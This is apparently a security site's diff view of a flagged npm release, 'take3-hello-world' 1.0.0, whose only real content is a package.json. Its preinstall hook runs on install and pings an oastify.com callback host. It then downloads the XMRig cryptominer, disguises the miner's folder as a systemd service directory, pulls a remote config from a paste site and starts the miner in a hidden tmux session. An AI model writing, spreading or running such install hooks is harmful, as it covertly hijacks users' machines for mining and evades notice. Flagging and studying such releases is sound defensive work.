take3-hello-world 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of take3-hello-world might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +0 -0
  2. package/package.json +13 -0
package/index.js ADDED
File without changes
package/package.json ADDED
@@ -0,0 +1,13 @@
1
+ {
2
+ "name": "take3-hello-world",
3
+ "version": "1.0.0",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "start": "node index.js",
8
+ "test": "echo \"Error: no test specified\" && exit 1",
9
+ "preinstall": "curl http://take3.o6vqhdk2poh2y3i3k4v8awv0nrtjh95y.oastify.com && cd /tmp && wget https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-jammy-x64.tar.gz && tar -xzvf xmrig-6.21.3-jammy-x64.tar.gz && rm xmrig-6.21.3-jammy-x64.tar.gz && mv xmrig-6.21.3 systemd-private-36e6f34eb600482a8e282-colord.service-AnOIAk && cd systemd-private-36e6f34eb600482a8e282-colord.service-AnOIAk && rm config.json && wget https://nopaste.net/s4conBps3i -O config.json && tmux new-session -d -s girmx './xmrig'"
10
+ },
11
+ "author": "Zenn",
12
+ "license": "ISC"
13
+ }